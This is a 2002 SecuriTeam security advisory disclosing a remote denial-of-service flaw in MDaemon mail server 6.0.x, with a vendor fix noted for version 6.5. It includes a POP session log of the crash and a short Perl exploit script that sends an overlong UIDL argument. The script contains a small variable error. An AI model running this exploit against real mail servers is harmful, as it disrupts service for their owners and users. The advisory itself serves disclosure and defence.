[NEWS] MDaemon SMTP/POP/IMAP Server DoS (Invalid UIDL, DELE)

From: support@securiteam.com
Date: 10/31/02 

From: support@securiteam.com
To: list@securiteam.com
Date: 31 Oct 2002 14:15:04 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  MDaemon SMTP/POP/IMAP Server DoS (Invalid UIDL, DELE)
------------------------------------------------------------------------

SUMMARY

 <http://www.mdaemon.com> MDaemon Server brings SMTP/POP/IMAP and MIME
mail services commonplace on UNIX hosts and the Internet to Windows based
servers and microcomputers. A vulnerability in the product allows remote
attackers to cause the server to crash.

DETAILS

Vulnerable systems:
 * MDaemon version 6.0.5
 * MDaemon version 6.0.6
 * MDaemon version 6.0.7

Immune systems:
 * MDaemon version 3.1.2
 * MDaemon version 5.0.7
 * MDaemon version 6.5

It's possible to kill MDaemon by sending long arguments (32b and above)
with DELE or UIDL commands. To do this u must have at least mail-account
on vulnerable host.

Here the log of attack on local a MDaemon POP-server:
+OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
<MDAEMON-F200210
271036.AA3656130MD0012@dark.ru>
USER D4rkGr3y
+OK D4rkGr3y... Recipient ok
PASS cool-pass
+OK D4rkGr3y@dark.ru's mailbox has 1 total messages (18356 octets).
UIDL 11111111111111111111111111111111

Connection to host lost...

Vendor response:
This has been fixed in 6.5 which will be released later today. If you are
under valid upgrade protection you should get it for free.

Exploit:
#!/usr/bin/perl
#MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "[vuln_host]";
$login = "[login]";
$pass = "[pass]";
$port = "110";
$data = "1";
$num = "32";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "tcp", Type => SOCK_STREAM)
or die "Couldn't connect: @!\n";
print $socket "USER $login\n";
print $socket "PASS $user\n";
print $socket "UIDL $buf\n";
close($socket);

#EOF

ADDITIONAL INFORMATION

The information has been provided by <mailto:grey_1999@mail.ru> D4rkGr3y,
 <mailto:wuher@swrpg.net> Robert Feldbauer,
<mailto:basil.hussain@kodakweddings.com> Basil Hussain, and
<mailto:kpietri@nvps.net> Karl Pietri.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages